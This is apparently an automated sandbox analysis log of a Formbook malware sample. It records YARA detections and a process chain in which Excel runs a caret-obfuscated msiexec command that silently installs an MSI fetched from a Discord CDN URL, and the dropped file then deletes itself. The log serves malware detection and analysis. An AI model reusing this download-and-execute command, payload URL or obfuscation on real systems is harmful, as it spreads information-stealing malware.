Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022ACBA4 | 9_2_022ACBA4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FFBD7 | 9_2_021FFBD7 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0228DBDA | 9_2_0228DBDA |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222286D | 9_2_0222286D |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220C85C | 9_2_0220C85C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0229F8EE | 9_2_0229F8EE |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02285955 | 9_2_02285955 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022029B2 | 9_2_022029B2 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A098E | 9_2_022A098E |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022169FE | 9_2_022169FE |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02232E2F | 9_2_02232E2F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221EE4C | 9_2_0221EE4C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02210F3F | 9_2_02210F3F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222DF7C | 9_2_0222DF7C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02230D3B | 9_2_02230D3B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220CD5B | 9_2_0220CD5B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0229FDDD | 9_2_0229FDDD |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0009E071 | 9_2_0009E071 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0009E5FC | 9_2_0009E5FC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082D87 | 9_2_00082D87 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082D90 | 9_2_00082D90 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00089E30 | 9_2_00089E30 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082FB0 | 9_2_00082FB0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9862 | 9_2_024E9862 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E1069 | 9_2_024E1069 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E1072 | 9_2_024E1072 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E8132 | 9_2_024E8132 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EDA6F | 9_2_024EDA6F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EAA32 | 9_2_024EAA32 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EDB0E | 9_2_024EDB0E |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E5B1F | 9_2_024E5B1F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E5B22 | 9_2_024E5B22 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E2CEC | 9_2_024E2CEC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E2CF2 | 9_2_024E2CF2 |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | |
Source: unknown | Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe | |
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wininit.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |